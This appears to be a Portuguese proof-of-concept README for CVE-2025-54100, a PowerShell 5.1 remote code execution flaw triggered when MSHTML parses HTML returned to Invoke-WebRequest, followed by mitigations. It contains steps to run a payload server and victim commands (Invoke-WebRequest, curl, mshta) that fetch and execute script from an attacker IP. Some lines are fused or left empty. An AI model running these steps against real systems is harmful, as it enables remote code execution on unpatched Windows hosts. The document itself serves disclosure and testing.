
CVE-2025-54100(Vulnerabilidade de execução remota de código no PowerShell)
Demonstra como CVE-2025-54100 pode levar à execução remota de código (RCE) no Windows PowerShell 5.1 por meio da análise de HTML malicioso.
Tipo de vulnerabilidade: risco de injeção de comandos quando Invoke-WebRequest não usa o parâmetro -UseBasicParsing
Nível de gravidade: CVSS 7.8 (Alto)
Causa raiz: a análise de respostas HTML baseada em MSHTML permite a execução de scripts (como ActiveXObject) no contexto do chamador
Sistemas afetados:
CVE-2025-54100.py retorna um payload HTML cuidadosamente construídoWScript.Shell / Shell.Applicationcalc.exepython3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
Inicie o serviço HTTP do PoC:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
Em um host Windows vulnerável, sem usar -UseBasicParsing, execute os seguintes comandos:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl (alias no PowerShell)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888
Certifique-se de que a porta corresponde à configuração do servidor. Se o sistema estiver vulnerável, o script incorporado será executado pelo analisador MSHTML.
Nota: alguns antivírus podem bloquear esse comportamento, mesmo que a vulnerabilidade de análise ainda exista.
calc.exe não aparecer:
Invoke-WebRequest sem usar -UseBasicParsingEsta etapa serve para validar o vetor de execução. Em cenários de ataque reais, os invasores podem usar ofuscação ou técnicas de bypass para contornar as restrições de segurança padrão.

A Microsoft já corrigiu essa vulnerabilidade em dezembro de 2025:
Instale prontamente as atualizações de segurança do Windows
Sempre use -UseBasicParsing para evitar a análise MSHTML:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
Migre para o PowerShell 7+ (pwsh). O PowerShell Core não depende mais do MSHTML para análise, evitando o problema em nível de arquitetura.